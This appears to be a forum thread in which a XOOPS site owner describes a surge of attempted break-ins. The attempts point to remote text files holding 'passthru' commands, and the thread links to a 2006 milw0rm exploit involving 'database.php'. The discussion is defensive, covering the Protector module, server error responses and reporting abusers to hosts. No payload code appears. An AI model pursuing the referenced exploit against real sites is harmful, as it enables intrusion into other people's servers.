Quote:
Somebody is clearly trying to break in. I hope you have your XOOPS Protector module up and running. Many of these hits may be random, but they clearly try to deliver a payload, and you can actually see it if you call up the txt files the hacker wants to execute on your server. Those are scripts that sniff out vulnerabilities in the servers setup and try to get shell access.
Yes, I use Protector, I wouldn't use XOOPS without it. Yep, lots of the text files have 'passthru' and other commands in them, clearly malicious activity, which I'd expect, but it has risen so much, I'm wondering if there is a new XOOPS exploit that people know about, and they are giving the site a hammering.
Fortunately, the server is configured to return a 403 on most of these, or a 404.
Quite a lot of these entries have 'database.php' in them, that's why I was wondering if there is a new expoit, but as yet unknown to a lot of people. Found one at
http://www.milw0rm.com/exploits/2623 , but it is dated Oct 2006, a long time ago.
Quote:
Where are these log entries from, anyway? They look funky.
Coming from many different IP addresses. Hmm, look funky, not too sure what you mean there ?? Oh, the domain name has been changed, for obvious security reasons, we don't want people actually trying it.
Quote:
If you have a lot of time to spare, you can contact the webhosts from which these scripts are served and tell them that some of their users are making nonsense. But then, that's a fight against windmills.
In the past, I sometimes used to actually look up the IP and contact the person/s concerned, and CC in their ISP, but that was when there were only a few a day. Much of that contact resulted in either the person having their account suspended or terminated, or other action. Most hosts appreciated being contacted. Also, as you mention, contact the 'source' from where the scripts are served, yes, did that in the past, in a lot of cases, it resulted in the file being removed. But some sort of automatted system would be better.
Quote:
You can also send a sample to your own webhost and ask them for guidance, and to make sure that the servers are configured correctly.
The host I use has it all tied down fairly well, but the 403 messages have now changed to 404's, so I'll ask why the server change.
Quote:
*edit* But probably, you don't want to have to do with those tugzip folks. So forget the suggestion with contacting them. In any case, make sure you don't use the Internet Explorer if you want to look around what's going on there.
Yes, I don't use IE, Firefox for me.
